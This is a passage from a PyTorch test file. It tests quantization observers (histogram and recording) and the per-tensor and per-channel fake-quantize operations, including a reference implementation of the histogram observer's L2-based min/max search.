x = torch.rand(3, 4)
obs(x)
scripted(x)
self.assertEqual(obs.calculate_qparams(), scripted.calculate_qparams())
buf = io.BytesIO()
torch.jit.save(scripted, buf)
buf.seek(0)
loaded = torch.jit.load(buf)
self.assertEqual(obs.calculate_qparams(), loaded.calculate_qparams())
# HistogramObserver that works like it does on master
class _ReferenceHistogramObserver(HistogramObserver):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@torch.jit.ignore
def _non_linear_param_search(self):
r"""Non-linear parameter search.
An approximation for L2 error minimization for selecting min/max.
By selecting new min/max, we filter out outliers in input distribution.
This follows the implementation of NormMinimization::NonlinearQuantizationParamsSearch in
caffe2/quantization/server/norm_minimization.cc
"""
def _get_norm(delta_begin, delta_end, density, norm_type):
r"""
Compute the norm of the values uniformly distributed between
delta_begin and delta_end.
norm = density * (integral_{begin, end} x^2)
= density * (end^3 - begin^3) / 3
"""
assert norm_type == "L2", "Only L2 norms are currently supported"
norm = 0.0
if norm_type == "L2":
norm = (
delta_end * delta_end * delta_end
- delta_begin * delta_begin * delta_begin
) / 3
return density * norm
def _compute_quantization_error(next_start_bin, next_end_bin, norm_type):
r"""
Compute the quantization error if we use start_bin to end_bin as the
min and max to do the quantization.
"""
bin_width = (self.max_val.item() - self.min_val.item()) / self.bins
norm = 0.0
dst_bin_width = bin_width * (next_end_bin - next_start_bin + 1) / self.dst_nbins
if dst_bin_width == 0.0:
return 0.0
for src_bin in range(self.bins):
# distances from the beginning of first dst_bin to the beginning and
# end of src_bin
src_bin_begin = (src_bin - next_start_bin) * bin_width
src_bin_end = src_bin_begin + bin_width
# which dst_bins the beginning and end of src_bin belong to?
dst_bin_of_begin = min(
self.dst_nbins - 1, max(0.0, math.floor(src_bin_begin / dst_bin_width))
)
dst_bin_of_end = min(
self.dst_nbins - 1, max(0.0, math.floor(src_bin_end / dst_bin_width))
)
dst_bin_of_begin_center = (
dst_bin_of_begin * dst_bin_width + dst_bin_width / 2
)
density = self.histogram[src_bin] / bin_width
if dst_bin_of_begin == dst_bin_of_end:
# if src_bin is entirely within 1 dst_bin
delta_begin = src_bin_begin - dst_bin_of_begin_center
delta_end = src_bin_end - dst_bin_of_begin_center
norm = norm + _get_norm(delta_begin, delta_end, density, norm_type)
else:
delta_begin = src_bin_begin - dst_bin_of_begin_center
delta_end = dst_bin_width / 2
norm = norm + _get_norm(delta_begin, delta_end, density, norm_type)
norm = norm + (dst_bin_of_end - dst_bin_of_begin - 1) * _get_norm(
-dst_bin_width / 2, dst_bin_width / 2, density, norm_type
)
dst_bin_of_end_center = (
dst_bin_of_end * dst_bin_width + dst_bin_width / 2
)
delta_begin = -dst_bin_width / 2
delta_end = src_bin_end - dst_bin_of_end_center
norm = norm + _get_norm(delta_begin, delta_end, density, norm_type)
return norm
assert self.histogram.size()[0] == self.bins, "bins mismatch"
bin_width = (self.max_val - self.min_val) / self.bins
# cumulative sum
total = sum(self.histogram)
cSum = torch.cumsum(self.histogram, dim=0)
stepsize = 1e-5 # granularity
alpha = 0.0 # lower bound
beta = 1.0 # upper bound
start_bin = 0
end_bin = self.bins - 1
norm_min = float("inf")
while alpha < beta:
# Find the next step
next_alpha = alpha + stepsize
next_beta = beta - stepsize
# find the left and right bins between the quantile bounds
l = start_bin
r = end_bin
while l < end_bin and cSum[l] < next_alpha * total:
l = l + 1
while r > start_bin and cSum[r] > next_beta * total:
r = r - 1
# decide the next move
next_start_bin = start_bin
next_end_bin = end_bin
if (l - start_bin) > (end_bin - r):
# move the start bin
next_start_bin = l
alpha = next_alpha
else:
# move the end bin
next_end_bin = r
beta = next_beta
if next_start_bin == start_bin and next_end_bin == end_bin:
continue
# calculate the quantization error using next_start_bin and next_end_bin
norm = _compute_quantization_error(next_start_bin, next_end_bin, "L2")
if norm > norm_min:
break
norm_min = norm
start_bin = next_start_bin
end_bin = next_end_bin
new_min = self.min_val + bin_width * start_bin
new_max = self.min_val + bin_width * (end_bin + 1)
return new_min, new_max
class TestRecordHistogramObserver(QuantizationTestCase):
# TODO: move this to quantize.py
def test_record_observer(self):
for qengine in supported_qengines:
with override_quantized_engine(qengine):
model = AnnotatedSingleLayerLinearModel()
model.qconfig = default_debug_qconfig
model = prepare(model)
# run the evaluation and dump all tensors
test_only_eval_fn(model, self.calib_data)
test_only_eval_fn(model, self.calib_data)
observer_dict = {}
get_observer_dict(model, observer_dict)
self.assertTrue('fc1.module.activation_post_process' in observer_dict.keys(),
'observer is not recorded in the dict')
self.assertEqual(len(observer_dict['fc1.module.activation_post_process'].get_tensor_value()),
2 * len(self.calib_data))
self.assertEqual(observer_dict['fc1.module.activation_post_process'].get_tensor_value()[0],
model(self.calib_data[0][0]))
@given(qdtype=st.sampled_from((torch.qint8, torch.quint8)),
qscheme=st.sampled_from((torch.per_tensor_affine, torch.per_tensor_symmetric)))
def test_observer_scriptable(self, qdtype, qscheme):
obs = RecordingObserver(dtype=qdtype, qscheme=qscheme)
scripted = torch.jit.script(obs)
x = torch.rand(3, 4)
obs(x)
scripted(x)
self.assertTrue(torch.equal(obs.get_tensor_value()[0], scripted.get_tensor_value()[0]))
buf = io.BytesIO()
torch.jit.save(scripted, buf)
buf.seek(0)
loaded = torch.jit.load(buf)
self.assertTrue(torch.equal(obs.get_tensor_value()[0], loaded.get_tensor_value()[0]))
@given(qdtype=st.sampled_from((torch.qint8, torch.quint8)),
qscheme=st.sampled_from((torch.per_tensor_affine, torch.per_tensor_symmetric)),
reduce_range=st.booleans())
@settings(max_examples=10)
def test_histogram_observer(self, qdtype, qscheme, reduce_range):
myobs = HistogramObserver(bins=3, dtype=qdtype, qscheme=qscheme, reduce_range=reduce_range)
# Calculate qparams should work for empty observers
qparams = myobs.calculate_qparams()
x = torch.tensor([2.0, 3.0, 4.0, 5.0], requires_grad=True)
y = torch.tensor([5.0, 6.0, 7.0, 8.0])
out_x = myobs(x)
self.assertTrue(out_x.requires_grad)
myobs(y)
self.assertEqual(myobs.min_val, 2.0)
self.assertEqual(myobs.max_val, 8.0)
self.assertEqual(myobs.histogram, [2., 3., 3.])
qparams = myobs.calculate_qparams()
if reduce_range:
if qscheme == torch.per_tensor_symmetric:
ref_scale = 0.0470588 * 255 / 127
ref_zero_point = 0 if qdtype is torch.qint8 else 128
else:
ref_scale = 0.0235294 * 255 / 127
ref_zero_point = -64 if qdtype is torch.qint8 else 0
else:
if qscheme == torch.per_tensor_symmetric:
ref_scale = 0.0470588
ref_zero_point = 0 if qdtype is torch.qint8 else 128
else:
ref_scale = 0.0235294
ref_zero_point = -128 if qdtype is torch.qint8 else 0
self.assertEqual(qparams[1].item(), ref_zero_point)
self.assertEqual(qparams[0].item(), ref_scale, atol=1e-5, rtol=0)
# Test for serializability
state_dict = myobs.state_dict()
b = io.BytesIO()
torch.save(state_dict, b)
b.seek(0)
loaded_dict = torch.load(b)
for key in state_dict:
self.assertEqual(state_dict[key], loaded_dict[key])
loaded_obs = HistogramObserver(bins=3, dtype=qdtype, qscheme=qscheme, reduce_range=reduce_range)
loaded_obs.load_state_dict(loaded_dict)
loaded_qparams = loaded_obs.calculate_qparams()
self.assertEqual(myobs.min_val, loaded_obs.min_val)
self.assertEqual(myobs.max_val, loaded_obs.max_val)
self.assertEqual(myobs.histogram, loaded_obs.histogram)
self.assertEqual(myobs.bins, loaded_obs.bins)
self.assertEqual(myobs.calculate_qparams(), loaded_obs.calculate_qparams())
def test_histogram_observer_one_sided(self):
myobs = HistogramObserver(bins=8, dtype=torch.quint8, qscheme=torch.per_tensor_affine, reduce_range=True)
x = torch.tensor([0.0, 0.3, 1.2, 1.7])
y = torch.tensor([0.1, 1.3, 2.0, 2.7])
myobs(x)
myobs(y)
self.assertEqual(myobs.min_val, 0)
qparams = myobs.calculate_qparams()
self.assertEqual(qparams[1].item(), 0)
def test_histogram_observer_same_inputs(self):
myobs = HistogramObserver(bins=3, dtype=torch.qint8, qscheme=torch.per_tensor_symmetric, reduce_range=False)
w = torch.ones(4, requires_grad=True)
x = torch.zeros(4, requires_grad=True)
y = torch.tensor([2.0, 3.0, 4.0, 5.0], requires_grad=True)
z = torch.tensor([5.0, 6.0, 7.0, 8.0])
myobs(w)
myobs(x)
myobs(x)
myobs(y)
myobs(z)
qparams = myobs.calculate_qparams()
self.assertEqual(myobs.min_val, 2.0)
self.assertEqual(myobs.max_val, 8.0)
self.assertEqual(myobs.histogram, [2., 3., 3.])
@given(N=st.sampled_from([10, 1000, 10**6]),
bins=st.sampled_from([256, 512, 1024, 2048]),
dtype=st.sampled_from([torch.qint8, torch.quint8]),
qscheme=st.sampled_from([torch.per_tensor_affine, torch.per_tensor_symmetric]),
reduce_range=st.booleans())
def test_histogram_observer_against_reference(self, N, bins, dtype, qscheme, reduce_range):
ref_obs = _ReferenceHistogramObserver(bins=bins, dtype=dtype, qscheme=qscheme, reduce_range=reduce_range)
my_obs = HistogramObserver(bins=bins, dtype=dtype, qscheme=qscheme, reduce_range=reduce_range)
for _ in range(10):
X = torch.randn(N)
my_obs(X)
ref_obs(X)
ref_qparams = ref_obs.calculate_qparams()
my_qparams = my_obs.calculate_qparams()
self.assertEqual(ref_qparams, my_qparams)
class TestFakeQuantizePerTensor(TestCase):
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.tensor(shapes=hu.array_shapes(1, 5,),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_forward_per_tensor(self, device, X):
r"""Tests the forward path of the FakeQuantizePerTensorAffine op.
"""
np.random.seed(NP_RANDOM_SEED)
X, (scale, zero_point, torch_type) = X
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
Y = _fake_quantize_per_tensor_affine_reference(X.cpu(), scale, zero_point, quant_min, quant_max)
Y_prime = torch.fake_quantize_per_tensor_affine(
X, scale, zero_point, quant_min, quant_max)
np.testing.assert_allclose(Y, Y_prime.cpu(), rtol=tolerance, atol=tolerance)
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.tensor(shapes=hu.array_shapes(1, 5,),
qparams=hu.qparams(dtypes=torch.quint8)))
@unittest.skip("temporarily disable the test")
def test_backward_per_tensor(self, device, X):
r"""Tests the backward method.
"""
np.random.seed(NP_RANDOM_SEED)
X, (scale, zero_point, torch_type) = X
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
X.requires_grad_()
Y = _fake_quantize_per_tensor_affine_reference(X.cpu(), scale, zero_point, quant_min, quant_max)
Y_prime = torch.fake_quantize_per_tensor_affine(
X, scale, zero_point, quant_min, quant_max)
dout = torch.rand(X.shape, dtype=torch.float).to(device)
dX = _fake_quantize_per_tensor_affine_grad_reference(
dout, X, scale, zero_point, quant_min, quant_max)
Y_prime.backward(dout)
np.testing.assert_allclose(dX.cpu(), X.grad.cpu().detach().numpy(), rtol=tolerance, atol=tolerance)
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.tensor(shapes=hu.array_shapes(1, 5,),
elements=hu.floats(-1e3, 1e3, allow_nan=False, allow_infinity=False),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_learnable_py_module_forward_per_tensor(self, device, X):
r"""Tests the forward path of the _LearnableFakeQuantize module per tensor op.
"""
X, (scale, zero_point, torch_type) = X
scale = torch.tensor([scale]).to(device)
zero_point = torch.tensor([zero_point]).to(device)
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
Y = _fake_quantize_per_tensor_affine_reference(
X, scale, zero_point, quant_min, quant_max).to(device)
Y_prime = _LearnableFakeQuantizePerTensorOp.apply(
X, scale, zero_point, quant_min, quant_max, 1.).to(device)
tolerance = 1e-2
self.assertTrue(
torch.allclose(Y, Y_prime, rtol=tolerance, atol=tolerance),
"Expected _LearnableFakeQuantizePerTensorOp to have results match the reference forward function")
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.tensor(shapes=hu.array_shapes(1, 5,),
elements=hu.floats(-1e3, 1e3, allow_nan=False, allow_infinity=False),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_learnable_py_module_backward_per_tensor(self, device, X):
X, (scale, zero_point, torch_type) = X
scale = torch.tensor([scale]).float().to(device)
zero_point = torch.tensor([zero_point]).float().to(device)
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
X.requires_grad_()
scale.requires_grad_()
zero_point.requires_grad_()
Y_prime = _LearnableFakeQuantizePerTensorOp.apply(
X, scale, zero_point, quant_min, quant_max, 1.)
dout = torch.rand(X.shape, dtype=torch.float).to(device)
dX, dScale, dZeroPoint = _fake_quantize_learnable_per_tensor_affine_grad_reference(
dout, X, scale, zero_point, quant_min, quant_max, device)
Y_prime.backward(dout)
expected_dX = dX.to(device).detach()
actual_dX = X.grad.to(device).detach()
expected_dScale = dScale.to(device).detach()
actual_dScale = scale.grad.to(device).detach()
expected_dZeroPoint = dZeroPoint.to(device).detach()
actual_dZeroPoint = zero_point.grad.to(device).detach()
tolerance = 1e-2
self.assertTrue(
torch.allclose(
expected_dX, actual_dX, rtol=tolerance, atol=tolerance),
"Expected dX to match X.grad")
self.assertTrue(
torch.allclose(
expected_dScale, actual_dScale, rtol=tolerance, atol=tolerance),
"Expected dScale to match scale.grad")
self.assertTrue(
torch.allclose(
expected_dZeroPoint, actual_dZeroPoint, rtol=tolerance, atol=tolerance),
"Expected dZeroPoint to match zero_point.grad")
def _test_learnable_forward_per_tensor(self, X, device, scale_base, zero_point_base):
X_base = torch.tensor(X).to(device)
for n_bits in (4, 8):
quant_min, quant_max = 0, 2 ** n_bits - 1
X = X_base.clone().float()
scale_base = scale_base.to(device).float()
zero_point_base = zero_point_base.to(dtype=torch.int64, device=device)
scale = scale_base.clone()
zero_point = zero_point_base.clamp(quant_min, quant_max)
Y = _fake_quantize_per_tensor_affine_reference(
X, scale, zero_point, quant_min, quant_max).to(device)
Y_prime = torch._fake_quantize_learnable_per_tensor_affine(
X, scale, zero_point, quant_min, quant_max).to(device)
self.assertTrue(
torch.allclose(Y, Y_prime, rtol=tolerance, atol=tolerance),
"Expected kernel forward function to have results match the reference forward function")
@given(X=hu.tensor(shapes=hu.array_shapes(1, 5,),
elements=hu.floats(-1e3, 1e3, allow_nan=False, allow_infinity=False),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_learnable_forward_per_tensor_cpu(self, X):
X, (_, _, _) = X
scale_base = torch.normal(mean=0, std=1, size=(1,)).clamp(1e-4, 100)
zero_point_base = torch.normal(mean=0, std=128, size=(1,))
self._test_learnable_forward_per_tensor(
X, 'cpu', scale_base, zero_point_base)
@given(X=hu.tensor(shapes=hu.array_shapes(1, 5,),
elements=hu.floats(-1e3, 1e3, allow_nan=False, allow_infinity=False),
qparams=hu.qparams(dtypes=torch.quint8)))
@unittest.skipIf(not TEST_CUDA, "No GPU is available.")
def test_learnable_forward_per_tensor_cuda(self, X):
X, (_, _, _) = X
scale_base = torch.normal(mean=0, std=1, size=(1,)).clamp(1e-4, 100)
zero_point_base = torch.normal(mean=0, std=128, size=(1,))
self._test_learnable_forward_per_tensor(
X, 'cuda', scale_base, zero_point_base)
def _test_learnable_backward_per_tensor(self, X, device, scale_base, zero_point_base):
r"""Tests the backward method with additional backprop support for scale and zero point.
"""
X_base = torch.tensor(X).to(device)
for n_bits in (4, 8):
quant_min, quant_max = 0, 2 ** n_bits - 1
X = X_base.clone().float().to(device)
X.requires_grad_()
scale_base = scale_base.to(device)
zero_point_base = zero_point_base.to(device)
scale = scale_base.clone()
scale.requires_grad_()
zero_point = zero_point_base.clone().clamp(quant_min, quant_max)
zero_point.requires_grad_()
Y_prime = torch._fake_quantize_learnable_per_tensor_affine(
X, scale, zero_point, quant_min, quant_max).to(device)
dout = torch.rand(X.shape, dtype=torch.float).to(device)
dX, dScale, dZeroPoint = _fake_quantize_learnable_per_tensor_affine_grad_reference(
dout, X, scale, zero_point, quant_min, quant_max, device)
Y_prime.backward(dout)
expected_dX = dX.to(device).detach()
actual_dX = X.grad.to(device).detach()
expected_dScale = dScale.to(device).detach()
actual_dScale = scale.grad.to(device).detach()
expected_dZeroPoint = dZeroPoint.to(device).detach()
actual_dZeroPoint = zero_point.grad.to(device).detach()
self.assertTrue(
torch.allclose(
expected_dX, actual_dX, rtol=tolerance, atol=tolerance),
"Expected dX to match X.grad")
self.assertTrue(
torch.allclose(
expected_dScale, actual_dScale, rtol=tolerance, atol=tolerance),
"Expected dScale to match scale.grad")
self.assertTrue(
torch.allclose(
expected_dZeroPoint, actual_dZeroPoint, rtol=tolerance, atol=tolerance),
"Expected dZeroPoint to match zero_point.grad")
@given(X=hu.tensor(shapes=hu.array_shapes(1, 5,),
elements=hu.floats(-1e3, 1e3, allow_nan=False, allow_infinity=False),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_learnable_backward_per_tensor_cpu(self, X):
torch.random.manual_seed(NP_RANDOM_SEED)
X, (_, _, _) = X
scale_base = torch.normal(mean=0, std=1, size=(1,)).clamp(1e-4, 100)
zero_point_base = torch.normal(mean=0, std=128, size=(1,))
self._test_learnable_backward_per_tensor(
X, 'cpu', scale_base, zero_point_base)
@given(X=hu.tensor(shapes=hu.array_shapes(1, 5,),
elements=hu.floats(-1e3, 1e3, allow_nan=False, allow_infinity=False),
qparams=hu.qparams(dtypes=torch.quint8)))
@unittest.skipIf(not TEST_CUDA, "No GPU is available.")
def test_learnable_backward_per_tensor_cuda(self, X):
torch.random.manual_seed(NP_RANDOM_SEED)
X, (_, _, _) = X
scale_base = torch.normal(mean=0, std=1, size=(1,)).clamp(1e-4, 100)
zero_point_base = torch.normal(mean=0, std=128, size=(1,))
self._test_learnable_backward_per_tensor(
X, 'cuda', scale_base, zero_point_base)
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.tensor(shapes=hu.array_shapes(1, 5,),
qparams=hu.qparams(dtypes=torch.quint8)))
# https://github.com/pytorch/pytorch/issues/30604
@unittest.skip("temporarily disable the test")
def test_numerical_consistency_per_tensor(self, device, X):
r"""Comparing numerical consistency between CPU quantize/dequantize op and the CPU fake quantize op
"""
np.random.seed(NP_RANDOM_SEED)
X, (scale, zero_point, torch_type) = X
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
# quantize_per_tensor and dequantize are only implemented on the CPU
Y = torch.dequantize(torch.quantize_per_tensor(X.cpu(), scale, zero_point, torch_type))
Y_prime = torch.fake_quantize_per_tensor_affine(
X, scale, zero_point, quant_min, quant_max)
np.testing.assert_allclose(Y, Y_prime.cpu(), rtol=tolerance, atol=tolerance)
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.tensor(shapes=hu.array_shapes(1, 5,),
qparams=hu.qparams(dtypes=[torch.quint8])),
)
def test_fq_module(self, device, X):
np.random.seed(NP_RANDOM_SEED)
X, (scale, zero_point, torch_type) = X
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
X.requires_grad_()
fq_module = torch.quantization.default_fake_quant().to(device)
Y_prime = fq_module(X)
assert fq_module.scale is not None
assert fq_module.zero_point is not None
Y = _fake_quantize_per_tensor_affine_reference(X, fq_module.scale, fq_module.zero_point, quant_min, quant_max)
np.testing.assert_allclose(Y.cpu().detach().numpy(), Y_prime.cpu().detach().numpy(), rtol=tolerance, atol=tolerance)
# Test backward
dout = torch.rand(X.shape, dtype=torch.float, device=device)
Y_prime.backward(dout)
dX = _fake_quantize_per_tensor_affine_grad_reference(dout, X, fq_module.scale, fq_module.zero_point, quant_min, quant_max)
np.testing.assert_allclose(dX.cpu().numpy(), X.grad.cpu().detach().numpy(), rtol=tolerance, atol=tolerance)
def test_fq_serializable(self):
observer = default_observer
quant_min = 0
quant_max = 255
fq_module = FakeQuantize(observer, quant_min, quant_max)
X = torch.tensor([-5, -3.5, -2, 0, 3, 5, 7], dtype=torch.float32)
y_ref = fq_module(X)
state_dict = fq_module.state_dict()
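# A sketch of where these constants come from: the default (reduce-range) observer
# quantizes over [0, 127], so for inputs spanning [-5, 7]:
#   scale = (7 - (-5)) / 127 ~= 0.094488, zero_point = round(5 / scale) = 53.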
self.assertEqual(state_dict['scale'], 0.094488)
self.assertEqual(state_dict['zero_point'], 53)
b = io.BytesIO()
torch.save(state_dict, b)
b.seek(0)
loaded_dict = torch.load(b)
loaded_fq_module = FakeQuantize(observer, quant_min, quant_max)
loaded_fq_module.load_state_dict(loaded_dict)
for key in state_dict:
self.assertEqual(state_dict[key], loaded_fq_module.state_dict()[key])
self.assertEqual(loaded_fq_module.calculate_qparams(), fq_module.calculate_qparams())
def test_fake_quant_control(self):
torch.manual_seed(42)
X = torch.rand(20, 10, dtype=torch.float32)
fq_module = torch.quantization.default_fake_quant()
# Output of fake quant is not identical to input
Y = fq_module(X)
self.assertNotEqual(Y, X)
torch.quantization.disable_fake_quant(fq_module)
X = torch.rand(20, 10, dtype=torch.float32)
Y = fq_module(X)
# Fake quant is disabled, output is identical to input
self.assertEqual(Y, X)
# Explicit copy at this point in time, because FakeQuant keeps internal
# state in mutable buffers.
scale = fq_module.scale.clone().detach()
zero_point = fq_module.zero_point.clone().detach()
torch.quantization.disable_observer(fq_module)
torch.quantization.enable_fake_quant(fq_module)
X = 10.0 * torch.rand(20, 10, dtype=torch.float32) - 5.0
Y = fq_module(X)
self.assertNotEqual(Y, X)
# Observer is disabled, scale and zero-point do not change
self.assertEqual(fq_module.scale, scale)
self.assertEqual(fq_module.zero_point, zero_point)
torch.quantization.enable_observer(fq_module)
Y = fq_module(X)
self.assertNotEqual(Y, X)
# Observer is enabled, scale and zero-point are different
self.assertNotEqual(fq_module.scale, scale)
self.assertNotEqual(fq_module.zero_point, zero_point)
def test_fake_quant_preserves_qparam_shapes_for_activations(self):
class Model(nn.Module):
def __init__(self):
super(Model, self).__init__()
self.linear = nn.Linear(4, 4)
def forward(self, x):
x = self.linear(x)
return x
m = Model()
m.qconfig = torch.quantization.get_default_qat_qconfig('fbgemm')
torch.quantization.prepare_qat(m, inplace=True)
scale_shape_before = m.linear.activation_post_process.scale.shape
zero_point_shape_before = m.linear.activation_post_process.zero_point.shape
x = torch.rand(4, 4, 4, 4)
m(x)
scale_shape_after = m.linear.activation_post_process.scale.shape
zero_point_shape_after = m.linear.activation_post_process.zero_point.shape
self.assertEqual(
scale_shape_before, scale_shape_after,
msg="FakeQuant scale shape must stay consistent")
self.assertEqual(
zero_point_shape_before, zero_point_shape_after,
msg="FakeQuant zero_point shape must stay consistent")
    def test_fake_quant_scriptable(self):
observer = default_observer
quant_min = 0
quant_max = 255
fq_module = FakeQuantize(observer, quant_min, quant_max)
scripted_module = torch.jit.script(fq_module)
X = torch.tensor([-5, -3.5, -2, 0, 3, 5, 7], dtype=torch.float32)
fq_module(X)
scripted_module(X)
self.assertEqual(fq_module.calculate_qparams(),
scripted_module.calculate_qparams())
buf = io.BytesIO()
torch.jit.save(scripted_module, buf)
buf.seek(0)
loaded_module = torch.jit.load(buf)
self.assertEqual(fq_module.calculate_qparams(),
loaded_module.calculate_qparams())
class TestFakeQuantizePerChannel(TestCase):
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.per_channel_tensor(shapes=hu.array_shapes(1, 5,),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_forward_per_channel(self, device, X):
r"""Tests the forward path of the FakeQuantizePerTensorAffine op.
"""
np.random.seed(NP_RANDOM_SEED)
X, (scale, zero_point, axis, torch_type) = X
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
scale = to_tensor(scale, device)
zero_point = torch.tensor(zero_point).to(dtype=torch.int64, device=device)
Y = _fake_quantize_per_channel_affine_reference(X.cpu(), scale.cpu(), zero_point.cpu(), axis, quant_min, quant_max)
Y_prime = torch.fake_quantize_per_channel_affine(
X, scale, zero_point, axis, quant_min, quant_max)
np.testing.assert_allclose(Y, Y_prime.cpu(), rtol=tolerance, atol=tolerance)
def _test_learnable_forward_per_channel(self, X_base, device, scale_base, zero_point_base, axis):
r"""Tests the forward path of the learnable FakeQuantizePerTensorAffine op.
"""
for n_bits in (4, 8):
quant_min, quant_max = 0, 2 ** (n_bits) - 1
scale_base = scale_base.to(device)
zero_point_base = zero_point_base.clamp(quant_min, quant_max)
X_curr = X_base.clone()
scale_curr = scale_base.clone()
zero_point_curr = zero_point_base.to(dtype=torch.int64, device=device)
Y = _fake_quantize_per_channel_affine_reference(
X_curr, scale_curr, zero_point_curr, axis, quant_min, quant_max).to(device)
Y_prime = torch._fake_quantize_learnable_per_channel_affine(
X_curr, scale_curr, zero_point_curr, axis, quant_min, quant_max).to(device)
self.assertTrue(
torch.allclose(Y, Y_prime, rtol=tolerance, atol=tolerance),
"Expected kernel forward function to have results match the reference forward function")
@given(X=hu.per_channel_tensor(shapes=hu.array_shapes(1, 5,),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_learnable_forward_per_channel_cpu(self, X):
torch.random.manual_seed(NP_RANDOM_SEED)
X, (_, _, axis, _) = X
X_base = torch.tensor(X).to('cpu')
channel_size = X_base.size(axis)
scale_base = torch.normal(mean=0, std=1, size=(channel_size,)).clamp(1e-4, 100)
zero_point_base = torch.normal(mean=0, std=128, size=(channel_size,))
self._test_learnable_forward_per_channel(
X_base, 'cpu', scale_base, zero_point_base, axis)
@given(X=hu.per_channel_tensor(shapes=hu.array_shapes(1, 5,),
qparams=hu.qparams(dtypes=torch.quint8)))
@unittest.skipIf(not TEST_CUDA, "No gpu is not available.")
def test_learnable_forward_per_channel_cuda(self, X):
torch.random.manual_seed(NP_RANDOM_SEED)
X, (_, _, axis, _) = X
X_base = torch.tensor(X).to('cuda')
channel_size = X_base.size(axis)
scale_base = torch.normal(mean=0, std=1, size=(channel_size,)).clamp(1e-4, 100)
zero_point_base = torch.normal(mean=0, std=128, size=(channel_size,))
self._test_learnable_forward_per_channel(
X_base, 'cuda', scale_base, zero_point_base, axis)
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.per_channel_tensor(shapes=hu.array_shapes(1, 5,),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_backward_per_channel(self, device, X):
r"""Tests the backward method.
"""
np.random.seed(NP_RANDOM_SEED)
X, (scale, zero_point, axis, torch_type) = X
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
scale = to_tensor(scale, device)
zero_point = torch.tensor(zero_point).to(dtype=torch.int64, device=device)
X.requires_grad_()
Y_prime = torch.fake_quantize_per_channel_affine(
X, scale, zero_point, axis, quant_min, quant_max)
dout = torch.rand(X.shape, dtype=torch.float).to(device)
dX = _fake_quantize_per_channel_affine_grad_reference(
dout, X, scale, zero_point, axis, quant_min, quant_max)
Y_prime.backward(dout)
np.testing.assert_allclose(dX.cpu().detach().numpy(), X.grad.cpu().detach().numpy(), rtol=tolerance, atol=tolerance)
def _test_learnable_backward_per_channel(self, X_base, device, scale_base, zero_point_base, axis):
r"""Tests the backward path of the learnable FakeQuantizePerTensorAffine op.
"""
for n_bits in (4, 8):
quant_min, quant_max = 0, 2 ** n_bits - 1
scale_base = scale_base.to(device)
zero_point_base = zero_point_base.to(device=device)
X_curr = X_base.clone()
X_curr.requires_grad_()
scale_curr = scale_base.clone()
scale_curr.requires_grad_()
zero_point_curr = zero_point_base.clamp(quant_min, quant_max)
zero_point_curr.requires_grad_()
Y_prime = torch._fake_quantize_learnable_per_channel_affine(
X_curr, scale_curr, zero_point_curr, axis, quant_min, quant_max).to(device)
dout = torch.rand(X_curr.shape, dtype=torch.float).to(device)
dX, dScale, dZeroPoint = _fake_quantize_learnable_per_channel_affine_grad_reference(
dout, X_curr, scale_curr, zero_point_curr, axis, quant_min, quant_max, device)
Y_prime.backward(dout)
dX_expected = dX.to(device).detach()
dX_actual = X_curr.to(device).grad.detach()
dScale_expected = dScale.to(device).detach()
dScale_actual = scale_curr.to(device).grad.detach()
dZeroPoint_expected = dZeroPoint.to(device).detach()
dZeroPoint_actual = zero_point_curr.to(device).grad.detach()
tolerance = 1e-4
self.assertTrue(
torch.allclose(dX_expected, dX_actual, rtol=tolerance, atol=tolerance),
"Expected dX to match X.grad")
self.assertTrue(
torch.allclose(dScale_expected, dScale_actual, rtol=tolerance, atol=tolerance),
"Expected dScale to match scale.grad")
self.assertTrue(
torch.allclose(dZeroPoint_expected, dZeroPoint_actual, rtol=tolerance, atol=tolerance),
"Expected dZeroPoint to match zero_point.grad")
@given(X=hu.per_channel_tensor(shapes=hu.array_shapes(2, 5,),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_learnable_backward_per_channel_cpu(self, X):
torch.random.manual_seed(NP_RANDOM_SEED)
X, (_, _, axis, _) = X
X_base = torch.tensor(X).to('cpu')
channel_size = X_base.size(axis)
scale_base = torch.normal(mean=0, std=1, size=(channel_size,)).clamp(1e-4, 100)
zero_point_base = torch.normal(mean=0, std=128, size=(channel_size,))
self._test_learnable_backward_per_channel(
X_base, 'cpu', scale_base, zero_point_base, axis)
@given(X=hu.per_channel_tensor(shapes=hu.array_shapes(2, 5,),
qparams=hu.qparams(dtypes=torch.quint8)))
@unittest.skip("temporarily disable the test")
def test_learnable_backward_per_channel_cuda(self, X):
torch.random.manual_seed(NP_RANDOM_SEED)
X, (scale, zero_point, axis, torch_type) = X
X_base = torch.tensor(X).to('cuda')
